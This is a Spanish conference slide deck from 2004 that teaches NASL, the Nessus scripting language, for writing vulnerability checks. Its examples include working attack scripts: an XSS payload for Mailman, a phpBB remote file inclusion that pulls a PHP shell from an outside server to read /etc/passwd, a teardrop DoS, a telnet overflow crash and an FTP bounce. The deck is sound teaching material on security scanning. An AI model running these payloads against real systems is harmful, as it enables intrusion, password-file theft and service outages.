NASL

FIST Conference Abril 2004

NASL
lenguaje de desarrollo de exploits

Rafael San Miguel Carrasco


Tareas típicas del exploit dev :

• escribir las cabeceras de un datagrama IP
• implementar un diálogo HTTP
• capturar y procesar paquetes en modo
promiscuo
• existencia de un fichero en un servidor
• comprobación de desbordamientos


Contenido:

1) NASL, Nessus, Knowledge Base
2) Sintaxis del lenguaje NASL
3) Librería de funciones
4) Ejemplos de programación
5) Consideraciones finales


Nessus:

• Escáner de vulnerabilidades
• Libre distribución
• Entornos UNIX
• www.nessus.org
• Para ampliar su capacidad: NASL

NASL = Nessus Attack Scripting Language


Modelo cliente / servidor:
nessus

nessusd host host host
nessus

nessus


Lanzamos el cliente Nessus:


Selección de plugins:


Fijamos algunas opciones:


Rango de direcciones IP:


Iniciamos el scan:


Informe de vulnerabilidades:


Intérprete NASL:

• nasl –t 192.168.0.128 script.nasl
• previamente lanzamos nessusd
• sólo direcciones IP permitidas
• políticas: nessusd.rules y nessusd.users


plugin malicioso:
nessus
script malicioso

nessusd host host host
nessus

nessus

reporte de vulnerabilidad

atacante


Otra restricción:

• NASL no permite la ejecución de comandos
locales

• No puede utilizarse para escribir exploits
de ámbito local


Knowledge Base:

• base de datos para cada host
• datos relevantes para los scripts
• set_kb_item ()
• get_kb_item ()


Atributos de la clase Services:

• Services/www
• Services/ftp
• Services/http_proxy
• Services/imap
• ...


Atributos de la clase Host:

• Host/OS
• Host/dead
• modificado por scripts de ataques DoS


Otros atributos:

• ftp/anonymous
• www/frontpage
• rpc/bootparamd
• bind/version
• ftp/root_via_cwd
• ...


Sintaxis: estructuras de control

• if (condición) { instr.} else { instr. }
• for (inic; condición; instr) { instr. }
• while (condición) { instr. }
• foreach elemento (array) { instr. }
• repeat { instr. } until (condición);
• operador x:
• send_packet (udp) x 30


Sintaxis: tipos de datos

• No se manejan explícitamente (Perl)
• Asignaciones:

• a = 100;
• nombre = “Rafael”;
• bytes = raw_string (0x41, 0x01, 0xFF);

• ¡No hay estructuras de datos!


Sintaxis: arrays

• a [1] = 450;
• b = “cadena”;
• if (b [2] == “a”)
• if (a [1] == 450)
• Caso 1 : b [2] = “o”;
• Caso 2 : b = insstr (b, “o”, 1, 1);


Sintaxis: funciones

• posibilidad de definir funciones
• existen limitaciones en la llamada a las
funciones definidas por el programador
• sintaxis:
function suma (a, b)
{ instr.
return (valor);
}


Sintaxis: funciones no anónimas

• no importa el orden y número de argumentos
especificados en la llamada
• debe indicarse el nombre de los argumentos:
send (data: “hola”, socket: s);
• si faltan datos: se solicitan en tiempo de
ejecución


Librería de funciones: clasificación

• manipulación de cadenas
• sockets
• raw sockets
• protocolos http, ftp, telnet
• funciones criptográficas
• funciones “vínculo” con Nessus


Funciones: manipulación de cadenas

• operadores ==, <, >
• operador ><
• if (“Access denied” >< respuesta)
• ereg () y egrep () para pattern matching
• crap : para testear desbordamientos
• crap (length: 1000, data: “bla”);


Funciones: sockets

• send (), recv () sin dirección IP destino
• recv_line (socket: s, length: 100, timeout: 5);
• get_port_state (port)
• tcp_ping ()
• open_priv_sock_udp (srcport, dstport)

• flag MSG_OOB en send () ¿Por qué?


Funciones: raw sockets

• protocolos soportados:
ICMP, IGMP, TCP, UDP, IP
• funciones forge_X_packet ()
• pcap_next ()
• funciones get_X_elements ()
• insert_ip_options ()
• send_packet ()


Funciones: http, ftp, telnet
• ftp_log_in (usuario, password)
• telnet_init ()
• http_get (), http_post (), http_head (), ...
• is_cgi_installed (“/cgi-bin/search.cgi”)
• cgi_dirs ()
http_get (port: 80, item: “/cgi-bin/search.cgi”,
data: “query=hola”);

¡No podemos simular servidores!


Funciones: criptográficas

• digests MD2, MD4, MD5
• digest SHA-1
• digest cifrado HMAC
HMAC_DSS, HMAC_MD2, HMAC_MD4,
HMAC_MD5, HMAC_RIPEMD160, ...


Funciones: integración con Nessus

• script_category ()
• script_family ()
• script_bugtraq_id ()
• script_cve_id ()
• script_dependencies ()


Funciones: integración con Nessus

• security_hole (descr., puerto)
• security_warning (descr., puerto)
• security_note (descr., puerto)


Ejemplo: XSS en Mailman

Pasos:
• comprobar la existencia del script
vulnerable
• enviar petición GET con código
HTML/Javascript
• comprobar respuesta del servidor


puerto = 80;
cadena = "<script>alert(document.domain)</script>";
url = "/cgi-bin/listinfo";

display ("nMailman XSS bug testn--------------------n");

if (is_cgi_installed (url, puerto) ) {

display ("info: listinfo existe en la version de mailman instaladan");

socket = open_sock_tcp (puerto);
peticion = http_get (item : "/cgi-bin/listinfo/" + cadena, port : puerto);
rsend = send (socket : socket, data : peticion);
rrecv = recv (socket : socket, length : 32000);
close(socket);


if (cadena >< rrecv)
{
display ("info: esta version de mailman es vulnerable a XSSnn");
} else {
display ("info: version NO vulnerable de mailmannn");
}

return (0);
}

display ("mailman no esta instalado en el servidornn");



Integración con Nessus:
• bloque if : registro en nessusd
if(description)
{

script_name(english:"Mailman XSS bug test");
script_description(english:"Comprobación del fallo de XSS en Mailman");
script_summary(english:“Petición GET con código HTML/JavaScript");
script_category(ACT_ATTACK); script_family(english:"Misc.");
script_copyright(english:"Rafael San Miguel Carrasco");
exit(0);

}



• notificación a Nessus
if (cadena >< rrecv)
{
report = “Mailman es vulnerable a XSS";
security_hole (port: 80, data:report);
}

• copiamos el .nasl /usr/lib/nessus/plugins
• relanzamos nessusd


Ejemplo: Inserción PHP en phpBB

• servidor web propio
• shell PHP de www.planet-source-code.com

<php passthru (‘cat /etc/passwd’) ?>



Pasos:
• comprobar la existencia del PHP
vulnerable
• enviar petición GET con parámetros
adecuados
• verificar que en la respuesta del servidor
aparece la cadena “root”


puerto = 80;
cadena = "phpbb_root_path=http://www.soluciones-seguras.com/&phpEx=php";
url = "/album_portal.php";

display ("nphpBB Modified Insertion Bug Testn---------------------------n");

if (is_cgi_installed (url, puerto) ) {
display ("info: phpBB esta instalado en el servidor n");

socket = open_sock_tcp (puerto);
peticion = http_get (item : url + "?" + cadena, port : puerto);
rsend = send (socket : socket, data : peticion);
rrecv = recv (socket : socket, length : 32000);
close(socket);


if ("root" >< rrecv)
{
display ("info: se ha conseguido el fichero /etc/passwd del servidorn");
# pattern matching
display (egrep (pattern: "^root*", string: rrecv) );
display ("nn");

} else {
display ("info: la version no es vulnerablenn");
}

return (0);
}



• bloque if de registro en nessusd
• llamada a security_hole () si el ataque
tiene éxito
• copiamos el .nasl /usr/lib/nessus/plugins
• relanzamos nessusd


Ejemplo: teardrop

• ataque DoS que afecta a los stacks
TCP/IP de algunos sistemas operativos
• fallo en el algoritmo de ensamblado
• implementación del exploit:
• datagrama UDP 1:
• payload N bytes, offset 0, MF on
• datagrama UDP 2:
• payload < N, offset < N, MF off


Ejemplo: teardrop
MAGIC = 2;
IPH = 20;
UDPH = 8;
PADDING = 0x1c;
MAGIC = 0x3;
IP_ID = 242;
sport = 123;
dport = 137;

LEN = IPH + UDPH + PADDING;

src = this_host();
ip = forge_ip_packet(ip_v : 4,
ip_hl : 5, ip_tos : 0, ip_id : IP_ID, ip_len : LEN,
ip_off : IP_MF, ip_p : IPPROTO_UDP, ip_src : src,
ip_ttl : 0x40);


Ejemplo: teardrop
LEN = UDPH + PADDING;
udp1 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport, uh_len : LEN);

LEN = IPH + MAGIC + 1;
set_ip_elements(ip: ip, ip_len : LEN, ip_off : MAGIC);

LEN = UDPH + PADDING;
udp2 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport, uh_len : LEN);

start_denial();
send_packet(udp1,udp2, pcap_active:FALSE) x 500;
alive = end_denial();

if(!alive) {
set_kb_item(name:"Host/dead", value:TRUE);
security_hole(0);
}


Ejemplo: overflow en BFTelnet
• nombre de usuario muy largo
• provoca la caída del servicio telnet
• fallo típico de muchos otros servidores
(ftp, pop3, ...)


Ejemplo: overflow en BFTelnet
port = get_kb_item ("Services/telnet");
if (!port) port = 23;
if (get_port_state(port)) {

soc = open_sock_tcp(port);
if (soc) {
banner = telnet_init(soc);
banner = string(banner, recv(socket:soc, length:1000));
data = string(crap(4000), "rn");
send(socket:soc, data:data);
close(soc);

soc2 = open_sock_tcp(port);
if(!soc2)
security_warning(port);
}
}


Ejemplo: ftp bouncing
• comando PORT para conexión de datos
(protocolo FTP)
• posibilidad de iniciar una conexión con
host arbitrario
• utilidad:
• port scanning
• bypass de las reglas de un firewall


Ejemplo: ftp bouncing
port = get_kb_item("Services/ftp");
if(!port)port = 21;

login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

if (login) {
soc = open_sock_tcp(port);
if(soc) {
if(ftp_log_in(socket:soc, user:login, pass:password)) {
command = string("PORT 66,88,91,109,0,21n");
send(socket:soc, data:command);
code = recv(socket:soc, length:4);
if(code == "200 ") security_hole(port);
}
close(soc);
}
}


Consideraciones finales:

• soporte multilenguaje
name["english"] = "BFTelnet DoS";
name["francais"]= "Déni de service contre BFTelnet";
script_name(english:name["english"],
francais:name["francais"]);

• forking automático y transparente
ejemplo: dos puertos telnet


Detección de WAPs con NASL:
www.tenablesecurity.com/white_papers/wap-id-nessus.pdf

Más información sobre NASL y Nessus:
www.nessus.org/documentation.html

Estas transparencias:
www.soluciones-seguras.com
www.fistconference.org


Nuestra empresa: Soluciones Seguras


¡Muchas gracias por venir!

NASL

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Was ist angesagt?

Was ist angesagt? (19)

Andere mochten auch

Andere mochten auch (8)

Ähnlich wie NASL

Ähnlich wie NASL (20)

Mehr von Conferencias FIST

Mehr von Conferencias FIST (20)

Kürzlich hochgeladen

Kürzlich hochgeladen (10)

NASL